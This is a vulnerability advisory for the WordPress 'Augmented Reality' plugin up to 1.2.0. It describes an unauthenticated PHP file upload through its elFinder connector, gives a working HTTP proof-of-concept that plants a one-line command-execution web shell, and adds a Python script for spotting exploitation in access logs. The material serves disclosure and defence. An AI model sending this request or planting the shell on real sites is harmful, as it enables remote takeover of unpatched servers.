WordPress Plugin Vulnerabilities

Augmented Reality <= 1.2.0 - Unauthenticated PHP File Upload leading to RCE

Description

The elFinder connector used by the plugin allows PHP files to be uploaded because its 'uploadAllow' option contains 'text/x-php'. This allows an unauthenticated user to upload PHP files, leading to an RCE vulnerability.

The issue is similar to https://wpscan.com/vulnerability/10389

Proof of Concept

```
POST /wp-content/plugins/augmented-reality/vendor/elfinder/php/connector.minimal.php HTTP/1.1
Host: 192.168.1.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42474892822150178483835528074
Content-Length: 737
Connection: close
Cookie: PHPSESSID=8940b45029f28b38e8339bae4dd10b18

-----------------------------42474892822150178483835528074
Content-Disposition: form-data; name="reqid"

1744f7298611ba
-----------------------------42474892822150178483835528074
Content-Disposition: form-data; name="cmd"

upload
-----------------------------42474892822150178483835528074
Content-Disposition: form-data; name="target"

l1_Lw
-----------------------------42474892822150178483835528074
Content-Disposition: form-data; name="upload[]"; filename="robbie3.php"
Content-Type: application/php

<?php system($_GET['cmd']); ?>

-----------------------------42474892822150178483835528074
Content-Disposition: form-data; name="mtime[]"

1597850374
-----------------------------42474892822150178483835528074--
```

The file ends up at:

/wp-content/plugins/augmented-reality/file_manager/robbie3.php
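
For triage on a site running the affected plugin, the following added example (not part of the original advisory) scans web access logs for POSTs to the connector path and for requests to script files in the upload directory named above. It assumes Combined Log Format; the extension list, the `find_suspicious` name and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Paths taken from the advisory's proof of concept.
CONNECTOR = ("/wp-content/plugins/augmented-reality/vendor/elfinder/php/"
             "connector.minimal.php")
UPLOAD_DIR = "/wp-content/plugins/augmented-reality/file_manager/"

# Combined Log Format prefix: ip ident user [time] "METHOD target PROTO" status
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                     r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
# Extensions often mapped to the PHP handler (assumed list, adjust per server).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)

def find_suspicious(lines):
    """Return (line_no, client_ip, kind, path) tuples worth triaging."""
    findings, uploaders = [], set()
    for n, line in enumerate(lines, 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # ignore lines that are not in the expected format
        path = unquote(urlsplit(m["target"]).path)  # drop query, decode %xx
        if m["method"] == "POST" and path == CONNECTOR:
            uploaders.add(m["ip"])
            findings.append((n, m["ip"], "connector_post", path))
        elif path.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(path):
            # 200 means a script exists in the upload directory and was served
            kind = "script_hit" if m["status"] == "200" else "script_probe"
            if m["ip"] in uploaders:
                kind += "_after_upload"
            findings.append((n, m["ip"], kind, path))
    return findings

# Constructed sample lines (documentation IP ranges, made-up file names).
SAMPLE_LOG = [
    f'198.51.100.7 - - [05/Nov/2020:10:00:01 +0000] "POST {CONNECTOR} HTTP/1.1" 200 512 "-" "-"',
    f'198.51.100.7 - - [05/Nov/2020:10:00:09 +0000] "GET {UPLOAD_DIR}sample.php?q=1 HTTP/1.1" 200 64 "-" "-"',
    f'192.0.2.10 - - [05/Nov/2020:10:01:00 +0000] "GET {UPLOAD_DIR}model.png HTTP/1.1" 200 2048 "-" "-"',
    f'192.0.2.10 - - [05/Nov/2020:10:02:00 +0000] "GET {UPLOAD_DIR}old.PHP HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_LOG):
        print(finding)
```

A `connector_post` entry alone is not proof of compromise, since the file manager also uses that endpoint; a `script_hit_after_upload` entry from the same client is the pattern to investigate first.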

Affects Plugins

No known fix

Miscellaneous

Original Researcher
Robert Wiggins
Verified
Yes

Timeline

Publicly Published
2020-11-05
Added
2020-11-05
Last Updated
2021-03-23
